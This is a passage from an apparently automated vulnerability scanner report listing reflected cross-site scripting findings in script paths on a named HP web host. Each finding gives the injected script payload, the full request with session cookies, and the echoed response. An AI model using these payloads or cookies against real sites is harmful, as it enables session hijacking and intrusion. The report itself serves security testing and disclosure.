Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:23 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30488


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts37d5c"><script>alert(1)</script>d1b7c146211/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.68. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/powered_utils.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727af"><script>alert(1)</script>fc4b8abf13a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/powered_utils.js727af"><script>alert(1)</script>fc4b8abf13a?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:23 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30681


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/powered_utils.js727af"><script>alert(1)</script>fc4b8abf13a?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.69. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/prototype.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0614"><script>alert(1)</script>cb5479040c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesa0614"><script>alert(1)</script>cb5479040c2/scripts/prototype.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30748


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesa0614"><script>alert(1)</script>cb5479040c2/scripts/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.70. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/prototype.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f724"><script>alert(1)</script>4700926501a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts1f724"><script>alert(1)</script>4700926501a/prototype.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:07 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts1f724"><script>alert(1)</script>4700926501a/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.71. http://h30187.www3.hp.com/resources/scripts/prototype.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/prototype.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbb7"><script>alert(1)</script>b36781bc679 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/prototype.js1fbb7"><script>alert(1)</script>b36781bc679?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/prototype.js1fbb7"><script>alert(1)</script>b36781bc679?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.72. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/scriptaculous.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef85"><script>alert(1)</script>e6810596064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources2ef85"><script>alert(1)</script>e6810596064/scripts/scriptaculous.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30965


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources2ef85"><script>alert(1)</script>e6810596064/scripts/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.73. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/scriptaculous.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0912"><script>alert(1)</script>9ac4d4ffdf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsa0912"><script>alert(1)</script>9ac4d4ffdf2/scriptaculous.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:07 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30576


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsa0912"><script>alert(1)</script>9ac4d4ffdf2/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.74. http://h30187.www3.hp.com/resources/scripts/scriptaculous.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/scriptaculous.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd3e"><script>alert(1)</script>922b4e83789 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/scriptaculous.js8fd3e"><script>alert(1)</script>922b4e83789?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/scriptaculous.js8fd3e"><script>alert(1)</script>922b4e83789?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.75. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/slider.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ecd"><script>alert(1)</script>f7e231bf138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources40ecd"><script>alert(1)</script>f7e231bf138/scripts/slider.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:57 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 31025


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources40ecd"><script>alert(1)</script>f7e231bf138/scripts/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.76. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/slider.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f565d"><script>alert(1)</script>1b065f7549d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsf565d"><script>alert(1)</script>1b065f7549d/slider.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30803


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf565d"><script>alert(1)</script>1b065f7549d/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.77. http://h30187.www3.hp.com/resources/scripts/slider.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/slider.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24576"><script>alert(1)</script>64b6d3570f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/slider.js24576"><script>alert(1)</script>64b6d3570f3?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30751


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/slider.js24576"><script>alert(1)</script>64b6d3570f3?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.78. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/sound.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87a9"><script>alert(1)</script>b864179465a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesd87a9"><script>alert(1)</script>b864179465a/scripts/sound.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:21 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesd87a9"><script>alert(1)</script>b864179465a/scripts/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.79. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/sound.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebe6"><script>alert(1)</script>cd545bc9316 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptscebe6"><script>alert(1)</script>cd545bc9316/sound.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:21 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30393


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscebe6"><script>alert(1)</script>cd545bc9316/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.80. http://h30187.www3.hp.com/resources/scripts/sound.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/sound.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26bb"><script>alert(1)</script>16e93b14366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/sound.jsc26bb"><script>alert(1)</script>16e93b14366?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:22 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30609


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/sound.jsc26bb"><script>alert(1)</script>16e93b14366?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.81. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d07e"><script>alert(1)</script>8207582cd96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources6d07e"><script>alert(1)</script>8207582cd96/scripts/swfobject.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
